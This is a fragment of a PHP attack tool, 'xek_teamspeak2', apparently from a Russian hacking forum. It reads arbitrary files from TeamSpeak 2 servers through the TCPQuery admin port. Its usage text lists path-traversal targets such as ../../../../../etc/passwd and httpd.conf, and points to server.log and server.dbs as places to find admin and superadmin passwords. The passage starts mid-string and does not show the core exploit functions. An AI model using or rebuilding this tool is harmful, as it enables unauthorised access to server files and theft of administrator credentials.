¬ teamspeak hostname or ip, for expamle "ts.antichat.ru"  ¬ port to TCQquery admin, default 51234  ¬ file to read.'; } function info() { echo '
for example: server.log server.dbs ../../../../../boot.ini ../../../../../etc/passwd ../../../../../usr/local/apache/conf/httpd.conf etc. brain on ;) admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files. '; } function head() { echo ' xek_teamspeak2 '; } head(); if (!$_GET) { html(); info(); } if (isset($_GET['go_fuck'])) { $hostname = $_POST['hostname']; $file = $_POST['file']; $port = $_POST['port']; if (isset($_POST['check_ver'])) { echo '
'.check_ver($hostname, 'ver', $port);
		
	}
	
	if (isset($_POST['parampampam']))
	{
		echo '';
		html();
		
	}
}

?>